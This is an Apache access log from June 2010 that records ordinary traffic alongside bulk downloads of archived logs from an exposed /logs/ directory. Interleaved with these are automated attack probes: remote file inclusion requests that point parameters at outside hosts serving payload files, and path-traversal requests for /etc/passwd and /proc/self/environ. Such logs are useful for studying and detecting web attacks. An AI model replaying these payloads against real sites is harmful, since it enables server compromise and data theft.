75.125.138.2 - - [21/Jun/2010:02:45:49 -0400] "GET /logs/access_log.Q110010400/includes/functions_admin.php?phpbb_root_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2010:02:45:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
178.63.50.147 - - [21/Jun/2010:02:45:16 -0400] "GET /logs/access_log.Q109062800 HTTP/1.1" 200 2206435 "http://www.aceonlinestore.com/logs/access_log.Q109062800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:45:16 -0400] "GET /logs/access_log.Q109070100 HTTP/1.1" 200 4008187 "http://www.aceonlinestore.com/logs/access_log.Q109070100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:45:16 -0400] "GET /logs/access_log.Q109070600 HTTP/1.1" 200 4677677 "http://www.aceonlinestore.com/logs/access_log.Q109070600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:45:16 -0400] "GET /logs/access_log.Q109063000 HTTP/1.1" 200 5874408 "http://www.aceonlinestore.com/logs/access_log.Q109063000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:45:16 -0400] "GET /logs/access_log.Q109070300 HTTP/1.1" 200 3011957 "http://www.aceonlinestore.com/logs/access_log.Q109070300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:45:16 -0400] "GET /logs/access_log.Q109062900 HTTP/1.1" 200 5053948 "http://www.aceonlinestore.com/logs/access_log.Q109062900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:45:16 -0400] "GET /logs/access_log.Q109070400 HTTP/1.1" 200 1764892 "http://www.aceonlinestore.com/logs/access_log.Q109070400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:45:16 -0400] "GET /logs/access_log.Q109062700 HTTP/1.1" 200 2243190 "http://www.aceonlinestore.com/logs/access_log.Q109062700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:45:16 -0400] "GET /logs/access_log.Q109070200 HTTP/1.1" 200 5653087 "http://www.aceonlinestore.com/logs/access_log.Q109070200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:45:16 -0400] "GET /logs/access_log.Q109070500 HTTP/1.1" 200 2033988 "http://www.aceonlinestore.com/logs/access_log.Q109070500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
216.17.105.143 - - [21/Jun/2010:02:46:26 -0400] "GET /logs/access_log.Q110061500/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.830"
178.63.50.147 - - [21/Jun/2010:02:46:17 -0400] "GET /logs/access_log.Q109070400 HTTP/1.1" 200 1764892 "http://www.aceonlinestore.com/logs/access_log.Q109070400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:46:17 -0400] "GET /logs/access_log.Q109070500 HTTP/1.1" 200 2033988 "http://www.aceonlinestore.com/logs/access_log.Q109070500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
64.6.104.146 - - [21/Jun/2010:02:46:39 -0400] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
64.6.104.146 - - [21/Jun/2010:02:46:39 -0400] "GET /includes/functions_admin.php?phpbb_root_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
64.6.104.146 - - [21/Jun/2010:02:46:39 -0400] "GET /logs/access_log.Q109101300/includes/functions_admin.php?phpbb_root_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
219.255.132.83 - - [21/Jun/2010:02:46:39 -0400] "GET /senetman/html/index.php?page=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
219.255.132.83 - - [21/Jun/2010:02:46:39 -0400] "GET /logs/senetman/html/index.php?page=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
219.255.132.83 - - [21/Jun/2010:02:46:39 -0400] "GET /logs/access_log.Q109082000/senetman/html/index.php?page=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
64.6.104.146 - - [21/Jun/2010:02:46:45 -0400] "GET /logs/access_log.Q110010400/includes/functions_admin.php?phpbb_root_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
95.156.233.139 - - [21/Jun/2010:02:47:06 -0400] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
64.6.104.146 - - [21/Jun/2010:02:47:06 -0400] "GET /includes/functions_admin.php?phpbb_root_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
64.6.104.146 - - [21/Jun/2010:02:47:06 -0400] "GET /logs/access_log.Q109101300/includes/functions_admin.php?phpbb_root_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
64.6.104.146 - - [21/Jun/2010:02:47:06 -0400] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
64.6.104.146 - - [21/Jun/2010:02:47:11 -0400] "GET /logs/access_log.Q110010400/includes/functions_admin.php?phpbb_root_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
82.76.12.197 - - [21/Jun/2010:02:47:22 -0400] "GET /logs/access_log.Q110060700/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:02:47:22 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:02:47:22 -0400] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55286 "-" "libwww-perl/5.831"
163.20.26.5 - - [21/Jun/2010:02:47:33 -0400] "GET /logs/error_log.Q110050400/index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
178.63.50.147 - - [21/Jun/2010:02:46:39 -0400] "GET /logs/access_log.Q109071200 HTTP/1.1" 200 2162244 "http://www.aceonlinestore.com/logs/access_log.Q109071200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:46:39 -0400] "GET /logs/access_log.Q109071300 HTTP/1.1" 200 4718643 "http://www.aceonlinestore.com/logs/access_log.Q109071300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:46:39 -0400] "GET /logs/access_log.Q109070800 HTTP/1.1" 200 4336924 "http://www.aceonlinestore.com/logs/access_log.Q109070800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:46:39 -0400] "GET /logs/access_log.Q109071100 HTTP/1.1" 200 2250018 "http://www.aceonlinestore.com/logs/access_log.Q109071100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:46:39 -0400] "GET /logs/access_log.Q109071500 HTTP/1.1" 200 4717248 "http://www.aceonlinestore.com/logs/access_log.Q109071500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:46:39 -0400] "GET /logs/access_log.Q109071600 HTTP/1.1" 200 5481659 "http://www.aceonlinestore.com/logs/access_log.Q109071600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:46:39 -0400] "GET /logs/access_log.Q109071400 HTTP/1.1" 200 5125803 "http://www.aceonlinestore.com/logs/access_log.Q109071400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:46:39 -0400] "GET /logs/access_log.Q109070700 HTTP/1.1" 200 4914184 "http://www.aceonlinestore.com/logs/access_log.Q109070700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:46:39 -0400] "GET /logs/access_log.Q109071000 HTTP/1.1" 200 3921078 "http://www.aceonlinestore.com/logs/access_log.Q109071000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:46:39 -0400] "GET /logs/access_log.Q109070900 HTTP/1.1" 200 4950912 "http://www.aceonlinestore.com/logs/access_log.Q109070900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
163.20.26.5 - - [21/Jun/2010:02:47:42 -0400] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
163.20.26.5 - - [21/Jun/2010:02:47:45 -0400] "GET /logs/index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
82.76.12.197 - - [21/Jun/2010:02:47:51 -0400] "GET /logs/access_log.Q110061500/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.831"
163.20.26.5 - - [21/Jun/2010:02:47:56 -0400] "GET /logs/error_log.Q110050400/index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
163.20.26.5 - - [21/Jun/2010:02:48:12 -0400] "GET /logs/index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
66.249.71.206 - - [21/Jun/2010:02:48:13 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L11516E5700C115001F2B093+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.17.105.143 - - [21/Jun/2010:02:48:30 -0400] "GET /logs/error_log.Q110060700/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 224 "-" "libwww-perl/5.830"
219.255.132.83 - - [21/Jun/2010:02:48:34 -0400] "GET /logs/access_log.Q109121200/senetman/html/index.php?page=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
178.63.50.147 - - [21/Jun/2010:02:47:39 -0400] "GET /logs/access_log.Q109072300 HTTP/1.1" 200 5083465 "http://www.aceonlinestore.com/logs/access_log.Q109072300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:47:39 -0400] "GET /logs/access_log.Q109071800 HTTP/1.1" 200 2661187 "http://www.aceonlinestore.com/logs/access_log.Q109071800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:47:39 -0400] "GET /logs/access_log.Q109071700 HTTP/1.1" 200 3577551 "http://www.aceonlinestore.com/logs/access_log.Q109071700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:47:39 -0400] "GET /logs/access_log.Q109072500 HTTP/1.1" 200 2074957 "http://www.aceonlinestore.com/logs/access_log.Q109072500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:47:39 -0400] "GET /logs/access_log.Q109072200 HTTP/1.1" 200 5101774 "http://www.aceonlinestore.com/logs/access_log.Q109072200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:47:39 -0400] "GET /logs/access_log.Q109072100 HTTP/1.1" 200 4525475 "http://www.aceonlinestore.com/logs/access_log.Q109072100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:47:39 -0400] "GET /logs/access_log.Q109072000 HTTP/1.1" 200 4437917 "http://www.aceonlinestore.com/logs/access_log.Q109072000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:47:39 -0400] "GET /logs/access_log.Q109072400 HTTP/1.1" 200 3768784 "http://www.aceonlinestore.com/logs/access_log.Q109072400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:47:39 -0400] "GET /logs/access_log.Q109072600 HTTP/1.1" 200 2133628 "http://www.aceonlinestore.com/logs/access_log.Q109072600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:47:39 -0400] "GET /logs/access_log.Q109071900 HTTP/1.1" 200 2331784 "http://www.aceonlinestore.com/logs/access_log.Q109071900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:48:40 -0400] "GET /logs/access_log.Q109072500 HTTP/1.1" 200 2074957 "http://www.aceonlinestore.com/logs/access_log.Q109072500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:48:53 -0400] "GET /logs/access_log.Q109080100 HTTP/1.1" 200 1996380 "http://www.aceonlinestore.com/logs/access_log.Q109080100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:48:53 -0400] "GET /logs/access_log.Q109072900 HTTP/1.1" 200 4189147 "http://www.aceonlinestore.com/logs/access_log.Q109072900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:48:53 -0400] "GET /logs/access_log.Q109073000 HTTP/1.1" 200 4555164 "http://www.aceonlinestore.com/logs/access_log.Q109073000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:48:53 -0400] "GET /logs/access_log.Q109080200 HTTP/1.1" 200 2084930 "http://www.aceonlinestore.com/logs/access_log.Q109080200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:48:53 -0400] "GET /logs/access_log.Q109072800 HTTP/1.1" 200 4911230 "http://www.aceonlinestore.com/logs/access_log.Q109072800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:48:53 -0400] "GET /logs/access_log.Q109072700 HTTP/1.1" 200 4190321 "http://www.aceonlinestore.com/logs/access_log.Q109072700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:48:53 -0400] "GET /logs/access_log.Q109073100 HTTP/1.1" 200 3531011 "http://www.aceonlinestore.com/logs/access_log.Q109073100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:48:53 -0400] "GET /logs/access_log.Q109080500 HTTP/1.1" 200 3793390 "http://www.aceonlinestore.com/logs/access_log.Q109080500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:48:53 -0400] "GET /logs/access_log.Q109080300 HTTP/1.1" 200 4623136 "http://www.aceonlinestore.com/logs/access_log.Q109080300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:48:53 -0400] "GET /logs/access_log.Q109080400 HTTP/1.1" 200 4786327 "http://www.aceonlinestore.com/logs/access_log.Q109080400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:49:53 -0400] "GET /logs/access_log.Q109080100 HTTP/1.1" 200 1996380 "http://www.aceonlinestore.com/logs/access_log.Q109080100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:49:53 -0400] "GET /logs/access_log.Q109080200 HTTP/1.1" 200 2084930 "http://www.aceonlinestore.com/logs/access_log.Q109080200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
114.108.128.56 - - [21/Jun/2010:02:51:22 -0400] "GET //pingserver.php HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
95.156.233.139 - - [21/Jun/2010:02:51:28 -0400] "GET /logs/access_log.Q110052800//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
95.156.233.139 - - [21/Jun/2010:02:51:28 -0400] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
95.156.233.139 - - [21/Jun/2010:02:51:28 -0400] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
178.63.50.147 - - [21/Jun/2010:02:50:28 -0400] "GET /logs/access_log.Q109080800 HTTP/1.1" 200 2589826 "http://www.aceonlinestore.com/logs/access_log.Q109080800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:50:28 -0400] "GET /logs/access_log.Q109081300 HTTP/1.1" 200 5011500 "http://www.aceonlinestore.com/logs/access_log.Q109081300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:50:28 -0400] "GET /logs/access_log.Q109080900 HTTP/1.1" 200 2146806 "http://www.aceonlinestore.com/logs/access_log.Q109080900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:50:28 -0400] "GET /logs/access_log.Q109080600 HTTP/1.1" 200 5127305 "http://www.aceonlinestore.com/logs/access_log.Q109080600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:50:28 -0400] "GET /logs/access_log.Q109081100 HTTP/1.1" 200 5268662 "http://www.aceonlinestore.com/logs/access_log.Q109081100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:50:28 -0400] "GET /logs/access_log.Q109081000 HTTP/1.1" 200 5307504 "http://www.aceonlinestore.com/logs/access_log.Q109081000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:50:28 -0400] "GET /logs/access_log.Q109080700 HTTP/1.1" 200 3796760 "http://www.aceonlinestore.com/logs/access_log.Q109080700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:50:28 -0400] "GET /logs/access_log.Q109081500 HTTP/1.1" 200 3060423 "http://www.aceonlinestore.com/logs/access_log.Q109081500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:50:28 -0400] "GET /logs/access_log.Q109081400 HTTP/1.1" 200 5006864 "http://www.aceonlinestore.com/logs/access_log.Q109081400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:50:28 -0400] "GET /logs/access_log.Q109081200 HTTP/1.1" 200 4716643 "http://www.aceonlinestore.com/logs/access_log.Q109081200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
211.234.100.196 - - [21/Jun/2010:02:51:56 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://inmobiliariapymsa.com/cache/test.gif?? HTTP/1.1" 404 254 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
211.234.100.196 - - [21/Jun/2010:02:51:56 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://inmobiliariapymsa.com/cache/test.gif?? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
178.63.50.147 - - [21/Jun/2010:02:51:28 -0400] "GET /logs/access_log.Q109082100 HTTP/1.1" 200 4228229 "http://www.aceonlinestore.com/logs/access_log.Q109082100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:51:28 -0400] "GET /logs/access_log.Q109081900 HTTP/1.1" 200 4260094 "http://www.aceonlinestore.com/logs/access_log.Q109081900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:51:28 -0400] "GET /logs/access_log.Q109081700 HTTP/1.1" 200 5323695 "http://www.aceonlinestore.com/logs/access_log.Q109081700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:51:28 -0400] "GET /logs/access_log.Q109082500 HTTP/1.1" 200 6226032 "http://www.aceonlinestore.com/logs/access_log.Q109082500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:51:28 -0400] "GET /logs/access_log.Q109082300 HTTP/1.1" 200 2549877 "http://www.aceonlinestore.com/logs/access_log.Q109082300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:51:28 -0400] "GET /logs/access_log.Q109082200 HTTP/1.1" 200 2103181 "http://www.aceonlinestore.com/logs/access_log.Q109082200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:51:28 -0400] "GET /logs/access_log.Q109082000 HTTP/1.1" 200 6174306 "http://www.aceonlinestore.com/logs/access_log.Q109082000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:51:28 -0400] "GET /logs/access_log.Q109081600 HTTP/1.1" 200 3536999 "http://www.aceonlinestore.com/logs/access_log.Q109081600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:51:28 -0400] "GET /logs/access_log.Q109081800 HTTP/1.1" 200 5710162 "http://www.aceonlinestore.com/logs/access_log.Q109081800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:51:28 -0400] "GET /logs/access_log.Q109082400 HTTP/1.1" 200 5108182 "http://www.aceonlinestore.com/logs/access_log.Q109082400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
95.156.233.139 - - [21/Jun/2010:02:52:51 -0400] "GET /logs/access_log.Q110060600//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
203.101.64.67 - - [21/Jun/2010:02:53:23 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:02:53:23 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
178.63.50.147 - - [21/Jun/2010:02:52:29 -0400] "GET /logs/access_log.Q109090100 HTTP/1.1" 200 5423123 "http://www.aceonlinestore.com/logs/access_log.Q109090100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:52:29 -0400] "GET /logs/access_log.Q109090400 HTTP/1.1" 200 3702764 "http://www.aceonlinestore.com/logs/access_log.Q109090400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:52:29 -0400] "GET /logs/access_log.Q109083100 HTTP/1.1" 200 4870488 "http://www.aceonlinestore.com/logs/access_log.Q109083100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:52:29 -0400] "GET /logs/access_log.Q109090300 HTTP/1.1" 200 5190518 "http://www.aceonlinestore.com/logs/access_log.Q109090300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:52:29 -0400] "GET /logs/access_log.Q109082600 HTTP/1.1" 200 5029665 "http://www.aceonlinestore.com/logs/access_log.Q109082600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:52:29 -0400] "GET /logs/access_log.Q109090200 HTTP/1.1" 200 4613673 "http://www.aceonlinestore.com/logs/access_log.Q109090200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:52:29 -0400] "GET /logs/access_log.Q109082900 HTTP/1.1" 200 2500375 "http://www.aceonlinestore.com/logs/access_log.Q109082900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:52:29 -0400] "GET /logs/access_log.Q109082800 HTTP/1.1" 200 4649792 "http://www.aceonlinestore.com/logs/access_log.Q109082800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:52:29 -0400] "GET /logs/access_log.Q109082700 HTTP/1.1" 200 4307776 "http://www.aceonlinestore.com/logs/access_log.Q109082700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
